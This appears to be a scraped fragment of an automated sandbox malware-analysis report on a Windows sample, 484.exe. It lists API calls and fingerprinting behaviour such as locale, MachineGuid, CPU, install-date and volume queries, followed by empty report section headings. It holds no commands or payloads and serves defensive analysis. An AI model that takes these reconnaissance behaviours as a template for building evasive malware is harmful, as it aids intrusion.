Code function: 10_2_0040A98B GetProcessHeap,GetProcessHeap,HeapAlloc,GetCapture,GetModuleHandleA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetOpenClipboardWindow,GetModuleHandleA,GetProcessHeap,GetUserNameA,GetProcessHeap,HeapAlloc,GetClipboardViewer,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,lstrcmpA,GetProcessHeap,GetComputerNameA,GetProcessHeap,HeapAlloc,GetCursor,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMenuCheckMarkDimensions,lstrcmpA,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMessageExtraInfo,GetProcessHeap,GetProcessHeap,HeapAlloc,GetClipboardOwner,GetProcessHeap,GetProcessHeap,HeapAlloc,GetLastError,GetProcessHeap,GetProcessHeap,HeapAlloc,CountClipboardFormats,GetProcessHeap,GetProcessHeap,HeapAlloc,GetFocus,GetProcessHeap,GetProcessHeap,HeapAlloc,GetMessageExtraInfo,GetProcessHeap,GetProcessHeap,HeapAlloc,GetForegroundWindow,GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessWindowStation,GetProcessHeap,GetProcessHeap,HeapAlloc,GetModuleHandleW,GetProcessHeap,GetProcessHeap,HeapAlloc,GetCaptur

10_2_0040A98B

Contains functionality to query windows version

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe

10_2_0040EFB9

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Contains functionality locales information (e.g. system language)

Show sources

Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	10_2_0042C882
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,GetLocaleInfoW,	10_2_004244D8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	10_2_0042C8E9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	10_2_0042C796
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_TranslateName,_TranslateName,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,__itow_s,	10_2_0042C925
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	10_2_0042C56A
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	10_2_0042C4C3
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: _strlen,EnumSystemLocalesA,	10_2_0042C859
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_2_0042C3CE
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	10_1_0042C882
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,__freea,	10_1_0042B9C8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,___crtGetLocaleInfoA,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	10_1_004244D8
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	10_1_0042C8E9
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	10_1_0042C5C5
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	10_1_0042C796
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_TranslateName,_TranslateName,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	10_1_0042C925
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	10_1_0042C56A
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	10_1_0042C4C3
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: GetLocaleInfoA,___ascii_strnicmp,	10_1_0042FC9F
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	10_1_0042C3CE

Queries information about the installed CPU (vendor, model number etc)

Show sources

Source: C:\Windows\System32\mstsc.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Users\LUKETA~1\AppData\Local\Temp\484.exe	Queries volume information: C:\ VolumeInformation

Behavior Graph

Yara Overview

No Yara matches

Screenshot

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Signature Overview

Spam, unwanted Advertisements and Ransom Demands:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Networking:

Remote Access Functionality:

Persistence and Installation Behavior:

Data Obfuscation:

Spreading:

System Summary:

HIPS / PFW / Operating System Protection Evasion:

Anti Debugging:

Malware Analysis System Evasion:

Hooking and other Techniques for Hiding and Protection:

Language, Device and Operating System Detection:

Behavior Graph

Yara Overview

Screenshot